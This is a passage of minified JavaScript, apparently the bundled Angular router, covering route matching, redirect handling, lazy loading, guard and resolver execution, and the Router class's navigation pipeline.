d=r.consumed.length>0?Object.assign(Object.assign({},c),r.consumed[r.consumed.length-1].parameters):c;return{matched:!0,consumedSegments:r.consumed,remainingSegments:e.slice(r.consumed.length),parameters:d,positionalParamSegments:null!==(i=r.posParams)&&void 0!==i?i:{}}}function t3(t,a,e,i,n="corrected"){if(e.length>0&&function Vue(t,a,e){return e.some(i=>a3(t,a,i)&&wd(i)!==Nn)}(t,e,i)){const c=new qn(a,function Fue(t,a,e,i){const n={};n[Nn]=i,i._sourceSegment=t,i._segmentIndexShift=a.length;for(const r of e)if(""===r.path&&wd(r)!==Nn){const c=new qn([],{});c._sourceSegment=t,c._segmentIndexShift=a.length,n[wd(r)]=c}return n}(t,a,i,new qn(e,t.children)));return c._sourceSegment=t,c._segmentIndexShift=a.length,{segmentGroup:c,slicedSegments:[]}}if(0===e.length&&function Bue(t,a,e){return e.some(i=>a3(t,a,i))}(t,e,i)){const c=new qn(t.segments,function Wue(t,a,e,i,n,r){const c={};for(const d of i)if(a3(t,e,d)&&!n[wd(d)]){const T=new qn([],{});T._sourceSegment=t,T._segmentIndexShift="legacy"===r?t.segments.length:a.length,c[wd(d)]=T}return Object.assign(Object.assign({},n),c)}(t,a,e,i,t.children,n));return c._sourceSegment=t,c._segmentIndexShift=a.length,{segmentGroup:c,slicedSegments:e}}const r=new qn(t.segments,t.children);return r._sourceSegment=t,r._segmentIndexShift=a.length,{segmentGroup:r,slicedSegments:e}}function a3(t,a,e){return(!(t.hasChildren()||a.length>0)||"full"!==e.pathMatch)&&""===e.path}function LL(t,a,e,i){return!!(wd(t)===i||i!==Nn&&a3(a,e,t))&&("**"===t.path||Bx(a,t,e).matched)}function zL(t,a,e){return 0===a.length&&!t.children[e]}const n3=!1;class o3{constructor(a){this.segmentGroup=a||null}}class WL{constructor(a){this.urlTree=a}}function ky(t){return b1(new o3(t))}function FL(t){return b1(new WL(t))}class Gue{constructor(a,e,i,n,r){this.injector=a,this.configLoader=e,this.urlSerializer=i,this.urlTree=n,this.config=r,this.allowRedirects=!0}apply(){const a=t3(this.urlTree.root,[],[],this.config).segmentGroup,e=new qn(a.segments,a.children);return this.expandSegmentGroup(this.injector,this.config,e,Nn).pipe(Xe(r=>this.createUrlTree(K4(r),this.urlTree.queryParams,this.urlTree.fragment))).pipe(Sh(r=>{if(r instanceof WL)return this.allowRedirects=!1,this.match(r.urlTree);throw r instanceof o3?this.noMatchError(r):r}))}match(a){return this.expandSegmentGroup(this.injector,this.config,a.root,Nn).pipe(Xe(n=>this.createUrlTree(K4(n),a.queryParams,a.fragment))).pipe(Sh(n=>{throw n instanceof o3?this.noMatchError(n):n}))}noMatchError(a){return new gi(4002,n3)}createUrlTree(a,e,i){const n=Ex(a);return new hg(n,e,i)}expandSegmentGroup(a,e,i,n){return 0===i.segments.length&&i.hasChildren()?this.expandChildren(a,e,i).pipe(Xe(r=>new qn([],r))):this.expandSegment(a,i,e,i.segments,n,!0)}expandChildren(a,e,i){const n=[];for(const r of Object.keys(i.children))"primary"===r?n.unshift(r):n.push(r);return Sa(n).pipe(Rh(r=>{const c=i.children[r],d=kL(e,r);return this.expandSegmentGroup(a,d,c,r).pipe(Xe(T=>({segment:T,outlet:r})))}),JN((r,c)=>(r[c.outlet]=c.segment,r),{}),ZN())}expandSegment(a,e,i,n,r,c){return Sa(i).pipe(Rh(d=>this.expandSegmentAgainstRoute(a,e,i,d,n,r,c).pipe(Sh(k=>{if(k instanceof o3)return Bi(null);throw k}))),xd(d=>!!d),Sh((d,T)=>{if(Fx(d))return zL(e,n,r)?Bi(new qn([],{})):ky(e);throw d}))}expandSegmentAgainstRoute(a,e,i,n,r,c,d){return LL(n,e,r,c)?void 0===n.redirectTo?this.matchSegmentAgainstRoute(a,e,n,r,c):d&&this.allowRedirects?this.expandSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c):ky(e):ky(e)}expandSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c){return"**"===n.path?this.expandWildCardWithParamsAgainstRouteUsingRedirect(a,i,n,c):this.expandRegularSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c)}expandWildCardWithParamsAgainstRouteUsingRedirect(a,e,i,n){const r=this.applyRedirectCommands([],i.redirectTo,{});return i.redirectTo.startsWith("/")?FL(r):this.lineralizeSegments(i,r).pipe(Ut(c=>{const d=new qn(c,{});return this.expandSegment(a,d,e,c,n,!1)}))}expandRegularSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c){const{matched:d,consumedSegments:T,remainingSegments:k,positionalParamSegments:q}=Bx(e,n,r);if(!d)return ky(e);const Y=this.applyRedirectCommands(T,n.redirectTo,q);return n.redirectTo.startsWith("/")?FL(Y):this.lineralizeSegments(n,Y).pipe(Ut(te=>this.expandSegment(a,e,i,te.concat(k),c,!1)))}matchSegmentAgainstRoute(a,e,i,n,r){return"**"===i.path?(a=SL(i,a),i.loadChildren?(i._loadedRoutes?Bi({routes:i._loadedRoutes,injector:i._loadedInjector}):this.configLoader.loadChildren(a,i)).pipe(Xe(d=>(i._loadedRoutes=d.routes,i._loadedInjector=d.injector,new qn(n,{})))):Bi(new qn(n,{}))):NL(e,i,n,a).pipe(Ur(({matched:c,consumedSegments:d,remainingSegments:T})=>{var k;return c?(a=null!==(k=i._injector)&&void 0!==k?k:a,this.getChildConfig(a,i,n).pipe(Ut(Y=>{var te;const pe=null!==(te=Y.injector)&&void 0!==te?te:a,Re=Y.routes,{segmentGroup:Fe,slicedSegments:Ne}=t3(e,d,T,Re),et=new qn(Fe.segments,Fe.children);if(0===Ne.length&&et.hasChildren())return this.expandChildren(pe,Re,et).pipe(Xe(It=>new qn(d,It)));if(0===Re.length&&0===Ne.length)return Bi(new qn(d,{}));const ut=wd(i)===r;return this.expandSegment(pe,et,Re,Ne,ut?Nn:r,!0).pipe(Xe(yt=>new qn(d.concat(yt.segments),yt.children)))}))):ky(e)}))}getChildConfig(a,e,i){return e.children?Bi({routes:e.children,injector:a}):e.loadChildren?void 0!==e._loadedRoutes?Bi({routes:e._loadedRoutes,injector:e._loadedInjector}):function Lue(t,a,e,i){const n=a.canLoad;return void 0===n||0===n.length?Bi(!0):Bi(n.map(c=>{const d=E1(c,t);return sp(function vue(t){return t&&Sy(t.canLoad)}(d)?d.canLoad(a,e):t.runInContext(()=>d(a,e)))})).pipe(D1(),OL())}(a,e,i).pipe(Ut(n=>n?this.configLoader.loadChildren(a,e).pipe(qr(r=>{e._loadedRoutes=r.routes,e._loadedInjector=r.injector})):function Uue(t){return b1(wL(n3,3))}())):Bi({routes:[],injector:a})}lineralizeSegments(a,e){let i=[],n=e.root;for(;;){if(i=i.concat(n.segments),0===n.numberOfChildren)return Bi(i);if(n.numberOfChildren>1||!n.children[Nn])return b1(new gi(4e3,n3));n=n.children[Nn]}}applyRedirectCommands(a,e,i){return this.applyRedirectCreateUrlTree(e,this.urlSerializer.parse(e),a,i)}applyRedirectCreateUrlTree(a,e,i,n){const r=this.createSegmentGroup(a,e.root,i,n);return new hg(r,this.createQueryParams(e.queryParams,this.urlTree.queryParams),e.fragment)}createQueryParams(a,e){const i={};return oc(a,(n,r)=>{if("string"==typeof n&&n.startsWith(":")){const d=n.substring(1);i[r]=e[d]}else i[r]=n}),i}createSegmentGroup(a,e,i,n){const r=this.createSegments(a,e.segments,i,n);let c={};return oc(e.children,(d,T)=>{c[T]=this.createSegmentGroup(a,d,i,n)}),new qn(r,c)}createSegments(a,e,i,n){return e.map(r=>r.path.startsWith(":")?this.findPosParam(a,r,n):this.findOrReturn(r,i))}findPosParam(a,e,i){const n=i[e.path.substring(1)];if(!n)throw new gi(4001,n3);return n}findOrReturn(a,e){let i=0;for(const n of e){if(n.path===a.path)return e.splice(i),n;i++}return a}}class Que{}class Xue{constructor(a,e,i,n,r,c,d,T){this.injector=a,this.rootComponentType=e,this.config=i,this.urlTree=n,this.url=r,this.paramsInheritanceStrategy=c,this.relativeLinkResolution=d,this.urlSerializer=T}recognize(){const a=t3(this.urlTree.root,[],[],this.config.filter(e=>void 0===e.redirectTo),this.relativeLinkResolution).segmentGroup;return this.processSegmentGroup(this.injector,this.config,a,Nn).pipe(Xe(e=>{if(null===e)return null;const i=new Y4([],Object.freeze({}),Object.freeze(Object.assign({},this.urlTree.queryParams)),this.urlTree.fragment,{},Nn,this.rootComponentType,null,this.urlTree.root,-1,{}),n=new Oh(i,e),r=new EL(this.url,n);return this.inheritParamsAndData(r._root),r}))}inheritParamsAndData(a){const e=a.value,i=TL(e,this.paramsInheritanceStrategy);e.params=Object.freeze(i.params),e.data=Object.freeze(i.data),a.children.forEach(n=>this.inheritParamsAndData(n))}processSegmentGroup(a,e,i,n){return 0===i.segments.length&&i.hasChildren()?this.processChildren(a,e,i):this.processSegment(a,e,i,i.segments,n)}processChildren(a,e,i){return Sa(Object.keys(i.children)).pipe(Rh(n=>{const r=i.children[n],c=kL(e,n);return this.processSegmentGroup(a,c,r,n)}),JN((n,r)=>n&&r?(n.push(...r),n):null),eL(n=>null!==n),B4(null),ZN(),Xe(n=>{if(null===n)return null;const r=VL(n);return function Yue(t){t.sort((a,e)=>a.value.outlet===Nn?-1:e.value.outlet===Nn?1:a.value.outlet.localeCompare(e.value.outlet))}(r),r}))}processSegment(a,e,i,n,r){return Sa(e).pipe(Rh(c=>{var d;return this.processSegmentAgainstRoute(null!==(d=c._injector)&&void 0!==d?d:a,c,i,n,r)}),xd(c=>!!c),Sh(c=>{if(Fx(c))return zL(i,n,r)?Bi([]):Bi(null);throw c}))}processSegmentAgainstRoute(a,e,i,n,r){var c,d;if(e.redirectTo||!LL(e,i,n,r))return Bi(null);let T;if("**"===e.path){const k=n.length>0?aL(n).parameters:{},q=HL(i)+n.length;T=Bi({snapshot:new Y4(n,k,Object.freeze(Object.assign({},this.urlTree.queryParams)),this.urlTree.fragment,qL(e),wd(e),null!==(d=null!==(c=e.component)&&void 0!==c?c:e._loadedComponent)&&void 0!==d?d:null,e,BL(i),q,GL(e),q),consumedSegments:[],remainingSegments:[]})}else T=NL(i,e,n,a).pipe(Xe(({matched:k,consumedSegments:q,remainingSegments:Y,parameters:te})=>{var pe,Re;if(!k)return null;const Fe=HL(i)+q.length;return{snapshot:new Y4(q,te,Object.freeze(Object.assign({},this.urlTree.queryParams)),this.urlTree.fragment,qL(e),wd(e),null!==(Re=null!==(pe=e.component)&&void 0!==pe?pe:e._loadedComponent)&&void 0!==Re?Re:null,e,BL(i),Fe,GL(e),Fe),consumedSegments:q,remainingSegments:Y}}));return T.pipe(Ur(k=>{var q,Y;if(null===k)return Bi(null);const{snapshot:te,consumedSegments:pe,remainingSegments:Re}=k;a=null!==(q=e._injector)&&void 0!==q?q:a;const Fe=null!==(Y=e._loadedInjector)&&void 0!==Y?Y:a,Ne=function Jue(t){return t.children?t.children:t.loadChildren?t._loadedRoutes:[]}(e),{segmentGroup:et,slicedSegments:ut}=t3(i,pe,Re,Ne.filter(yt=>void 0===yt.redirectTo),this.relativeLinkResolution);if(0===ut.length&&et.hasChildren())return this.processChildren(Fe,Ne,et).pipe(Xe(yt=>null===yt?null:[new Oh(te,yt)]));if(0===Ne.length&&0===ut.length)return Bi([new Oh(te,[])]);const Ze=wd(e)===r;return this.processSegment(Fe,Ne,et,ut,Ze?Nn:r).pipe(Xe(yt=>null===yt?null:[new Oh(te,yt)]))}))}}function Zue(t){const a=t.value.routeConfig;return a&&""===a.path&&void 0===a.redirectTo}function VL(t){const a=[],e=new Set;for(const i of t){if(!Zue(i)){a.push(i);continue}const n=a.find(r=>i.value.routeConfig===r.value.routeConfig);void 0!==n?(n.children.push(...i.children),e.add(n)):a.push(i)}for(const i of e){const n=VL(i.children);a.push(new Oh(i.value,n))}return a.filter(i=>!e.has(i))}function BL(t){let a=t;for(;a._sourceSegment;)a=a._sourceSegment;return a}function HL(t){var a,e;let i=t,n=null!==(a=i._segmentIndexShift)&&void 0!==a?a:0;for(;i._sourceSegment;)i=i._sourceSegment,n+=null!==(e=i._segmentIndexShift)&&void 0!==e?e:0;return n-1}function qL(t){return t.data||{}}function GL(t){return t.resolve||{}}function jL(t){return"string"==typeof t.title||null===t.title}function Hx(t){return Ur(a=>{const e=t(a);return e?Sa(e).pipe(Xe(()=>a)):Bi(a)})}let QL=(()=>{class t{buildTitle(e){var i;let n,r=e.root;for(;void 0!==r;)n=null!==(i=this.getResolvedTitleForRoute(r))&&void 0!==i?i:n,r=r.children.find(c=>c.outlet===Nn);return n}getResolvedTitleForRoute(e){return e.data[yy]}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return Po($L)},providedIn:"root"}),t})(),$L=(()=>{class t extends QL{constructor(e){super(),this.title=e}updateTitle(e){const i=this.buildTitle(e);void 0!==i&&this.title.setTitle(i)}}return t.\u0275fac=function(e){return new(e||t)(At(UP))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();class she{}class lhe extends class che{shouldDetach(a){return!1}store(a,e){}shouldAttach(a){return!1}retrieve(a){return null}shouldReuseRoute(a,e){return a.routeConfig===e.routeConfig}}{}const s3=new ni("",{providedIn:"root",factory:()=>({})}),Ux=new ni("ROUTES");let qx=(()=>{class t{constructor(e,i){this.injector=e,this.compiler=i,this.componentLoaders=new WeakMap,this.childrenLoaders=new WeakMap}loadComponent(e){if(this.componentLoaders.get(e))return this.componentLoaders.get(e);if(e._loadedComponent)return Bi(e._loadedComponent);this.onLoadStartListener&&this.onLoadStartListener(e);const i=sp(e.loadComponent()).pipe(qr(r=>{this.onLoadEndListener&&this.onLoadEndListener(e),e._loadedComponent=r}),U4(()=>{this.componentLoaders.delete(e)})),n=new bx(i,()=>new J).pipe(yx());return this.componentLoaders.set(e,n),n}loadChildren(e,i){if(this.childrenLoaders.get(i))return this.childrenLoaders.get(i);if(i._loadedRoutes)return Bi({routes:i._loadedRoutes,injector:i._loadedInjector});this.onLoadStartListener&&this.onLoadStartListener(i);const r=this.loadModuleFactoryOrRoutes(i.loadChildren).pipe(Xe(d=>{this.onLoadEndListener&&this.onLoadEndListener(i);let T,k,q=!1;Array.isArray(d)?k=d:(T=d.create(e).injector,k=iL(T.get(Ux,[],Da.Self|Da.Optional)));return{routes:k.map(Wx),injector:T}}),U4(()=>{this.childrenLoaders.delete(i)})),c=new bx(r,()=>new J).pipe(yx());return this.childrenLoaders.set(i,c),c}loadModuleFactoryOrRoutes(e){return sp(e()).pipe(Ut(i=>i instanceof Ok||Array.isArray(i)?Bi(i):Sa(this.compiler.compileModuleAsync(i))))}}return t.\u0275fac=function(e){return new(e||t)(At(Ko),At(WD))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();class mhe{}class uhe{shouldProcessUrl(a){return!0}extract(a){return a}merge(a,e){return a}}function hhe(t){throw t}function fhe(t,a,e){return a.parse("/")}const phe={paths:"exact",fragment:"ignored",matrixParams:"ignored",queryParams:"exact"},_he={paths:"subset",fragment:"ignored",matrixParams:"ignored",queryParams:"subset"};function XL(){var t,a;const e=Po(lL),i=Po(xy),n=Po(iy),r=Po(Ko),c=Po(WD),d=null!==(t=Po(Ux,{optional:!0}))&&void 0!==t?t:[],T=null!==(a=Po(s3,{optional:!0}))&&void 0!==a?a:{},k=Po($L),q=Po(QL,{optional:!0}),Y=Po(mhe,{optional:!0}),te=Po(she,{optional:!0}),pe=new Oo(null,e,i,n,r,c,iL(d));return Y&&(pe.urlHandlingStrategy=Y),te&&(pe.routeReuseStrategy=te),pe.titleStrategy=null!=q?q:k,function ghe(t,a){t.errorHandler&&(a.errorHandler=t.errorHandler),t.malformedUriErrorHandler&&(a.malformedUriErrorHandler=t.malformedUriErrorHandler),t.onSameUrlNavigation&&(a.onSameUrlNavigation=t.onSameUrlNavigation),t.paramsInheritanceStrategy&&(a.paramsInheritanceStrategy=t.paramsInheritanceStrategy),t.relativeLinkResolution&&(a.relativeLinkResolution=t.relativeLinkResolution),t.urlUpdateStrategy&&(a.urlUpdateStrategy=t.urlUpdateStrategy),t.canceledNavigationResolution&&(a.canceledNavigationResolution=t.canceledNavigationResolution)}(T,pe),pe}let Oo=(()=>{class t{constructor(e,i,n,r,c,d,T){this.rootComponentType=e,this.urlSerializer=i,this.rootContexts=n,this.location=r,this.config=T,this.lastSuccessfulNavigation=null,this.currentNavigation=null,this.disposed=!1,this.navigationId=0,this.currentPageId=0,this.isNgZoneEnabled=!1,this.events=new J,this.errorHandler=hhe,this.malformedUriErrorHandler=fhe,this.navigated=!1,this.lastSuccessfulId=-1,this.afterPreactivation=()=>Bi(void 0),this.urlHandlingStrategy=new uhe,this.routeReuseStrategy=new lhe,this.onSameUrlNavigation="ignore",this.paramsInheritanceStrategy="emptyOnly",this.urlUpdateStrategy="deferred",this.relativeLinkResolution="corrected",this.canceledNavigationResolution="replace",this.configLoader=c.get(qx),this.configLoader.onLoadEndListener=te=>this.triggerEvent(new Jme(te)),this.configLoader.onLoadStartListener=te=>this.triggerEvent(new Yme(te)),this.ngModule=c.get(Z_),this.console=c.get(ioe);const Y=c.get(qi);this.isNgZoneEnabled=Y instanceof qi&&qi.isInAngularZone(),this.resetConfig(T),this.currentUrlTree=function Mme(){return new hg(new qn([],{}),{},null)}(),this.rawUrlTree=this.currentUrlTree,this.browserUrlTree=this.currentUrlTree,this.routerState=AL(this.currentUrlTree,this.rootComponentType),this.transitions=new zs({id:0,targetPageId:0,currentUrlTree:this.currentUrlTree,currentRawUrl:this.currentUrlTree,extractedUrl:this.urlHandlingStrategy.extract(this.currentUrlTree),urlAfterRedirects:this.urlHandlingStrategy.extract(this.currentUrlTree),rawUrl:this.currentUrlTree,extras:{},resolve:null,reject:null,promise:Promise.resolve(!0),source:"imperative",restoredState:null,currentSnapshot:this.routerState.snapshot,targetSnapshot:null,currentRouterState:this.routerState,targetRouterState:null,guards:{canActivateChecks:[],canDeactivateChecks:[]},guardsResult:null}),this.navigations=this.setupNavigations(this.transitions),this.processNavigations()}get browserPageId(){var e;return null===(e=this.location.getState())||void 0===e?void 0:e.\u0275routerPageId}setupNavigations(e){const i=this.events;return e.pipe(Dn(n=>0!==n.id),Xe(n=>Object.assign(Object.assign({},n),{extractedUrl:this.urlHandlingStrategy.extract(n.rawUrl)})),Ur(n=>{let r=!1,c=!1;return Bi(n).pipe(qr(d=>{this.currentNavigation={id:d.id,initialUrl:d.rawUrl,extractedUrl:d.extractedUrl,trigger:d.source,extras:d.extras,previousNavigation:this.lastSuccessfulNavigation?Object.assign(Object.assign({},this.lastSuccessfulNavigation),{previousNavigation:null}):null}}),Ur(d=>{const T=this.browserUrlTree.toString(),k=!this.navigated||d.extractedUrl.toString()!==T||T!==this.currentUrlTree.toString();if(("reload"===this.onSameUrlNavigation||k)&&this.urlHandlingStrategy.shouldProcessUrl(d.rawUrl))return YL(d.source)&&(this.browserUrlTree=d.extractedUrl),Bi(d).pipe(Ur(Y=>{const te=this.transitions.getValue();return i.next(new Ey(Y.id,this.serializeUrl(Y.extractedUrl),Y.source,Y.restoredState)),te!==this.transitions.getValue()?ha:Promise.resolve(Y)}),function jue(t,a,e,i){return Ur(n=>function que(t,a,e,i,n){return new Gue(t,a,e,i,n).apply()}(t,a,e,n.extractedUrl,i).pipe(Xe(r=>Object.assign(Object.assign({},n),{urlAfterRedirects:r}))))}(this.ngModule.injector,this.configLoader,this.urlSerializer,this.config),qr(Y=>{this.currentNavigation=Object.assign(Object.assign({},this.currentNavigation),{finalUrl:Y.urlAfterRedirects}),n.urlAfterRedirects=Y.urlAfterRedirects}),function the(t,a,e,i,n,r){return Ut(c=>function Kue(t,a,e,i,n,r,c="emptyOnly",d="legacy"){return new Xue(t,a,e,i,n,c,d,r).recognize().pipe(Ur(T=>null===T?function $ue(t){return new G(a=>a.error(t))}(new Que):Bi(T)))}(t,a,e,c.urlAfterRedirects,i.serialize(c.urlAfterRedirects),i,n,r).pipe(Xe(d=>Object.assign(Object.assign({},c),{targetSnapshot:d}))))}(this.ngModule.injector,this.rootComponentType,this.config,this.urlSerializer,this.paramsInheritanceStrategy,this.relativeLinkResolution),qr(Y=>{if(n.targetSnapshot=Y.targetSnapshot,"eager"===this.urlUpdateStrategy){if(!Y.extras.skipLocationChange){const pe=this.urlHandlingStrategy.merge(Y.urlAfterRedirects,Y.rawUrl);this.setBrowserUrl(pe,Y)}this.browserUrlTree=Y.urlAfterRedirects}const te=new jme(Y.id,this.serializeUrl(Y.extractedUrl),this.serializeUrl(Y.urlAfterRedirects),Y.targetSnapshot);i.next(te)}));if(k&&this.rawUrlTree&&this.urlHandlingStrategy.shouldProcessUrl(this.rawUrlTree)){const{id:te,extractedUrl:pe,source:Re,restoredState:Fe,extras:Ne}=d,et=new Ey(te,this.serializeUrl(pe),Re,Fe);i.next(et);const ut=AL(pe,this.rootComponentType).snapshot;return Bi(n=Object.assign(Object.assign({},d),{targetSnapshot:ut,urlAfterRedirects:pe,extras:Object.assign(Object.assign({},Ne),{skipLocationChange:!1,replaceUrl:!1})}))}return this.rawUrlTree=d.rawUrl,d.resolve(null),ha}),qr(d=>{const T=new Qme(d.id,this.serializeUrl(d.extractedUrl),this.serializeUrl(d.urlAfterRedirects),d.targetSnapshot);this.triggerEvent(T)}),Xe(d=>n=Object.assign(Object.assign({},d),{guards:gue(d.targetSnapshot,d.currentSnapshot,this.rootContexts)})),function wue(t,a){return Ut(e=>{const{targetSnapshot:i,currentSnapshot:n,guards:{canActivateChecks:r,canDeactivateChecks:c}}=e;return 0===c.length&&0===r.length?Bi(Object.assign(Object.assign({},e),{guardsResult:!0})):function Iue(t,a,e,i){return Sa(t).pipe(Ut(n=>function Nue(t,a,e,i,n){const r=a&&a.routeConfig?a.routeConfig.canDeactivate:null;return r&&0!==r.length?Bi(r.map(d=>{var T;const k=null!==(T=wy(a))&&void 0!==T?T:n,q=E1(d,k);return sp(function Eue(t){return t&&Sy(t.canDeactivate)}(q)?q.canDeactivate(t,a,e,i):k.runInContext(()=>q(t,a,e,i))).pipe(xd())})).pipe(D1()):Bi(!0)}(n.component,n.route,e,a,i)),xd(n=>!0!==n,!0))}(c,i,n,t).pipe(Ut(d=>d&&function Mue(t){return"boolean"==typeof t}(d)?function Rue(t,a,e,i){return Sa(a).pipe(Rh(n=>ug(function kue(t,a){return null!==t&&a&&a(new Zme(t)),Bi(!0)}(n.route.parent,i),function Sue(t,a){return null!==t&&a&&a(new tue(t)),Bi(!0)}(n.route,i),function Oue(t,a,e){const i=a[a.length-1],r=a.slice(0,a.length-1).reverse().map(c=>function Cue(t){const a=t.routeConfig?t.routeConfig.canActivateChild:null;return a&&0!==a.length?{node:t,guards:a}:null}(c)).filter(c=>null!==c).map(c=>rp(()=>Bi(c.guards.map(T=>{var k;const q=null!==(k=wy(c.node))&&void 0!==k?k:e,Y=E1(T,q);return sp(function Tue(t){return t&&Sy(t.canActivateChild)}(Y)?Y.canActivateChild(i,t):q.runInContext(()=>Y(i,t))).pipe(xd())})).pipe(D1())));return Bi(r).pipe(D1())}(t,n.path,e),function Pue(t,a,e){const i=a.routeConfig?a.routeConfig.canActivate:null;if(!i||0===i.length)return Bi(!0);const n=i.map(r=>rp(()=>{var c;const d=null!==(c=wy(a))&&void 0!==c?c:e,T=E1(r,d);return sp(function Aue(t){return t&&Sy(t.canActivate)}(T)?T.canActivate(a,t):d.runInContext(()=>T(a,t))).pipe(xd())}));return Bi(n).pipe(D1())}(t,n.route,e))),xd(n=>!0!==n,!0))}(i,r,t,a):Bi(d)),Xe(d=>Object.assign(Object.assign({},e),{guardsResult:d})))})}(this.ngModule.injector,d=>this.triggerEvent(d)),qr(d=>{if(n.guardsResult=d.guardsResult,pg(d.guardsResult))throw xL(0,d.guardsResult);const T=new $me(d.id,this.serializeUrl(d.extractedUrl),this.serializeUrl(d.urlAfterRedirects),d.targetSnapshot,!!d.guardsResult);this.triggerEvent(T)}),Dn(d=>!!d.guardsResult||(this.restoreHistory(d),this.cancelNavigationTransition(d,"",3),!1)),Hx(d=>{if(d.guards.canActivateChecks.length)return Bi(d).pipe(qr(T=>{const k=new Kme(T.id,this.serializeUrl(T.extractedUrl),this.serializeUrl(T.urlAfterRedirects),T.targetSnapshot);this.triggerEvent(k)}),Ur(T=>{let k=!1;return Bi(T).pipe(function ihe(t,a){return Ut(e=>{const{targetSnapshot:i,guards:{canActivateChecks:n}}=e;if(!n.length)return Bi(e);let r=0;return Sa(n).pipe(Rh(c=>function ahe(t,a,e,i){const n=t.routeConfig,r=t._resolve;return void 0!==(null==n?void 0:n.title)&&!jL(n)&&(r[yy]=n.title),function nhe(t,a,e,i){const n=function ohe(t){return[...Object.keys(t),...Object.getOwnPropertySymbols(t)]}(t);if(0===n.length)return Bi({});const r={};return Sa(n).pipe(Ut(c=>function rhe(t,a,e,i){var n;const r=null!==(n=wy(a))&&void 0!==n?n:i,c=E1(t,r);return sp(c.resolve?c.resolve(a,e):r.runInContext(()=>c(a,e)))}(t[c],a,e,i).pipe(xd(),qr(d=>{r[c]=d}))),Mx(1),H4(r),Sh(c=>Fx(c)?ha:b1(c)))}(r,t,a,i).pipe(Xe(c=>(t._resolvedData=c,t.data=TL(t,e).resolve,n&&jL(n)&&(t.data[yy]=n.title),null)))}(c.route,i,t,a)),qr(()=>r++),Mx(1),Ut(c=>r===n.length?Bi(e):ha))})}(this.paramsInheritanceStrategy,this.ngModule.injector),qr({next:()=>k=!0,complete:()=>{k||(this.restoreHistory(T),this.cancelNavigationTransition(T,"",2))}}))}),qr(T=>{const k=new Xme(T.id,this.serializeUrl(T.extractedUrl),this.serializeUrl(T.urlAfterRedirects),T.targetSnapshot);this.triggerEvent(k)}))}),Hx(d=>{const T=k=>{var q;const Y=[];(null===(q=k.routeConfig)||void 0===q?void 0:q.loadComponent)&&!k.routeConfig._loadedComponent&&Y.push(this.configLoader.loadComponent(k.routeConfig).pipe(qr(te=>{k.component=te}),Xe(()=>{})));for(const te of k.children)Y.push(...T(te));return Y};return mg(T(d.targetSnapshot.root)).pipe(B4(),Cn(1))}),Hx(()=>this.afterPreactivation()),Xe(d=>{const T=function rue(t,a,e){const i=Dy(t,a._root,e?e._root:void 0);return new vL(i,a)}(this.routeReuseStrategy,d.targetSnapshot,d.currentRouterState);return n=Object.assign(Object.assign({},d),{targetRouterState:T})}),qr(d=>{this.currentUrlTree=d.urlAfterRedirects,this.rawUrlTree=this.urlHandlingStrategy.merge(d.urlAfterRedirects,d.rawUrl),this.routerState=d.targetRouterState,"deferred"===this.urlUpdateStrategy&&(d.extras.skipLocationChange||this.setBrowserUrl(this.rawUrlTree,d),this.browserUrlTree=d.urlAfterRedirects)}),((t,a,e)=>Xe(i=>(new _ue(a,i.targetRouterState,i.currentRouterState,e).activate(t),i)))(this.rootContexts,this.routeReuseStrategy,d=>this.triggerEvent(d)),qr({next(){r=!0},complete(){r=!0}}),U4(()=>{var d;r||c||this.cancelNavigationTransition(n,"",1),(null===(d=this.currentNavigation)||void 0===d?void 0:d.id)===n.id&&(this.currentNavigation=null)}),Sh(d=>{var T;if(c=!0,RL(d)){IL(d)||(this.navigated=!0,this.restoreHistory(n,!0));const k=new X4(n.id,this.serializeUrl(n.extractedUrl),d.message,d.cancellationCode);if(i.next(k),IL(d)){const q=this.urlHandlingStrategy.merge(d.url,this.rawUrlTree),Y={skipLocationChange:n.extras.skipLocationChange,replaceUrl:"eager"===this.urlUpdateStrategy||YL(n.source)};this.scheduleNavigation(q,"imperative",null,Y,{resolve:n.resolve,reject:n.reject,promise:n.promise})}else n.resolve(!1)}else{this.restoreHistory(n,!0);const k=new yL(n.id,this.serializeUrl(n.extractedUrl),d,null!==(T=n.targetSnapshot)&&void 0!==T?T:void 0);i.next(k);try{n.resolve(this.errorHandler(d))}catch(q){n.reject(q)}}return ha}))}))}resetRootComponentType(e){this.rootComponentType=e,this.routerState.root.component=this.rootComponentType}setTransition(e){this.transitions.next(Object.assign(Object.assign({},this.transitions.value),e))}initialNavigation(){this.setUpLocationChangeListener(),0===this.navigationId&&this.navigateByUrl(this.location.path(!0),{replaceUrl:!0})}setUpLocationChangeListener(){this.locationSubscription||(this.locationSubscription=this.location.subscribe(e=>{const i="popstate"===e.type?"popstate":"hashchange";"popstate"===i&&setTimeout(()=>{var n;const r={replaceUrl:!0},c=null!==(n=e.state)&&void 0!==n&&n.navigationId?e.state:null;if(c){const T=Object.assign({},c);delete T.navigationId,delete T.\u0275routerPageId,0!==Object.keys(T).length&&(r.state=T)}const d=this.parseUrl(e.url);this.scheduleNavigation(d,i,c,r)},0)}))}get url(){return this.serializeUrl(this.currentUrlTree)}getCurrentNavigation(){return this.currentNavigation}triggerEvent(e){this.events.next(e)}resetConfig(e){this.config=e.map(Wx),this.navigated=!1,this.lastSuccessfulId=-1}ngOnDestroy(){this.dispose()}dispose(){this.transitions.complete(),this.locationSubscription&&(this.locationSubscription.unsubscribe(),this.locationSubscription=void 0),this.disposed=!0}createUrlTree(e,i={}){const{relativeTo:n,queryParams:r,fragment:c,queryParamsHandling:d,preserveFragment:T}=i,k=n||this.routerState.root,q=T?this.currentUrlTree.fragment:c;let Y=null;switch(d){case"merge":Y=Object.assign(Object.assign({},this.currentUrlTree.queryParams),r);break;case"preserve":Y=this.currentUrlTree.queryParams;break;default:Y=r||null}return null!==Y&&(Y=this.removeEmptyProps(Y)),Vme(k,this.currentUrlTree,e,Y,null!=q?q:null)}navigateByUrl(e,i={skipLocationChange:!1}){const n=pg(e)?e:this.parseUrl(e),r=this.urlHandlingStrategy.merge(n,this.rawUrlTree);return this.scheduleNavigation(r,"imperative",null,i)}navigate(e,i={skipLocationChange:!1}){return function Che(t){for(let a=0;a<t.length;a++){if(null==t[a])throw new 